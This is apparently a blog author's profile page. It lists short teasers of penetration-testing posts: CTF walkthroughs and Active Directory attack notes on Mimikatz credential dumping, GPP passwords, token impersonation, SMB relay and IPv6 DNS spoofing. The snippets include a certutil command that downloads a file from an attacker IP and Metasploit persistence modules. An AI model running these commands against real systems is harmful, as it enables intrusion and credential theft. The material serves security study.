Open in app

Sign in

Write

Sign in

Aditya Jha
Aditya Jha

33 Followers

Home

Lists

About

Sep 10

Dark Web: Hidden Side of Internet

KEY CONCEPTS The Dark Web is a network of websites that are not indexed by the search engines and require specific software to access. These websites are hosted on an encrypted network and are not accessible on standard browsers. Encrypted Networks: An encrypted network is a network that uses encryption techniques to…

Dark Web Search

3 min read

Dark Web: Hidden Side of Internet
Dark Web: Hidden Side of Internet
Dark Web Search

3 min read


Sep 9

Wgel CTF: Walkthrough

This is a very easy machine, in which we have to get into the machine through SSH and then we have to escalate our privileges to get the root flag. So Our Very First step is to run the Nmap scan. Command: nmap -T5 -p- -A <target IP> Now in…

Wgel Ctf

4 min read

Wgel CTF: Walkthrough
Wgel CTF: Walkthrough
Wgel Ctf

4 min read


Sep 3

Steel Mountain Walkthrough

INTRODUCTION: So this Room called Steel Mountain is based on a series named as Mr. Robot, The very First question in this Introduction part is: What is the name of Employee of the month? If we go to the page and click to download the image then we can see the…

Mr Robot

4 min read

Steel Mountain Walkthrough
Steel Mountain Walkthrough
Mr Robot

4 min read


Jul 20

Post Exploitation: Active Directory

File Transfer Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP python -m SimpleHTTPServer 80 Browser Navigate directly to file FTP python -m pyftpdlib 21 (attacker machine) ftp 10.10.10.10 (Attacker IP) Linux wget Maintaining Access Persistence Scripts run persistence -h exploit/windows/local/persistence exploit/windows/local/registry_persistence Schedule Tasks run scheduleme

Post Exploitation

1 min read

Post Exploitation: Active Directory
Post Exploitation: Active Directory
Post Exploitation

1 min read


Jul 18

AD ATTACKS WITH MIMIKATZ

OVERVIEW What is Mimikatz? Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks Dumps credentials stored in memory. Just a few attacks: Credentials Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket. CREDENTIAL DUMPING We will use the tool named as Mimikatz to dump credentials from a computer. We are assuming that a…

Mimikatz

3 min read

AD ATTACKS WITH MIMIKATZ
AD ATTACKS WITH MIMIKATZ
Mimikatz

3 min read


Jul 17

GPP Attacks: AD Post Compromise Attack

Overview Group Policy Preferences allowed admins to create policies using embedded credentials. These credentials were encrypted and placed in a “cPassword” The key was accidentally released(whoops) Patched in MS14–025, but doesn’t prevent previous uses Group Policy Pwnage: https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ ABUSING GPP We will solve a machine which is available on hack the box. …

Gpp

3 min read

GPP Attacks: AD Post Compromise Attack
GPP Attacks: AD Post Compromise Attack
Gpp

3 min read


Jul 16

Token Impersonation: AD Post Compromise Attack

Overview What are tokens? Temporary keys that allow you access to a system/network without having provide credentials each time you access a file. Think cookies for computers. Two types: Delegate- Created for logging into a machine or using Remote Desktop. Impersonate- “non-interactive” such as attaching a network drive or a domain logon script. Steps: Pop a shell…

Active Directory Attack

3 min read

Token Impersonation: AD Post Compromise Attack
Token Impersonation: AD Post Compromise Attack
Active Directory Attack

3 min read


Jul 15

Domain Enumeration using BloodHound

Bloodhound Overview Bloodhound is a tool which is used to download the data essentially of Active directory and it will visualize the data in a graph. So that we are going to be able to identify a lot of information about a network very quickly. Command to install Bloodhound: sudo apt install…

Bloodhound

2 min read

Domain Enumeration using BloodHound
Domain Enumeration using BloodHound
Bloodhound

2 min read


Jul 14

IPv6 Attack: An AD Attack

Overview If both the IPv4 and IPv6 is turned on and if you are utilizing IPv4 then who’s doing DNS for IPv6, the simple answer is usually nobody. Now we will setup an attacker machine that will listen to IPv6 and represent itself as a DNS for it. When we reboot…

Ipv6

5 min read

IPv6 Attack: AD Attack
IPv6 Attack: AD Attack
Ipv6

5 min read


Jul 12

SMB Relay: An AD Attack

What is SMB Relay? Instead of cracking the hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. Requirements: SMB signing must be disabled on the target. Relayed user credentials must be admin on machine. SMB signing will check that the packets are coming from right place…

Smb Relay Attack

4 min read

SMB Relay: An AD Attack
SMB Relay: An AD Attack
Smb Relay Attack

4 min read

Aditya Jha

Aditya Jha

33 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams